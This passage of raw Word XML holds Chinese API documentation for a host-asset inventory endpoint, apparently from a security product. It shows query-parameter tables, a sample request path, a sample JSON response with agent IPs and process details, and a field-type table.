          <w:p w14:paraId="1605792C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B064BEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5276F2B7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="497390DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71897CDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42886A40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0661012E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12FD9288" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="384A2861" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FFBD92C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC72ED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="335D07B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件应用名称（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7111B20F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EB34D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E56CFE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1371D849" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11833194" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="227F70D6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EE8EB99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>binPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A33A0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08F6ED07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EFD307" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>为二进制路径，windows 为安装路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33B03D61" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E188B8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>configPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EAE507A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60523142" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C38A21E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>配置文件路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B2F7BF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3A8BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="025D5E17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF3C65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "联系",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gam_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "0.1.7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>binPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>configPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "processes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gam_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 5571,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECD6B2"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452"/>
        <w:gridCol w:w="1072"/>
        <w:gridCol w:w="3911"/>
        <w:gridCol w:w="3647"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CA7268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EF539A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40B10D4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63579903" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3295ECB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28598EE2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="737D36FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25B3B273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D1A922" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B5288DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50555F9E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECB2CAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237DA1A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25AF04A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4651EF47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51D54229" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76420EA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F393033" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FFB0765" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5772A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52CEC353" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D57F728" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B1B8B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6706F4DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EC42E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10DE4F6A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61281E38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B1C26BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6206AC59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350EB90F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7AF2B31B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B995C9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0582DB57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08254617" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FE9DA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A13DC47" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BCE0FCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B409153" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3713E7EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11B579F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48C95CE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
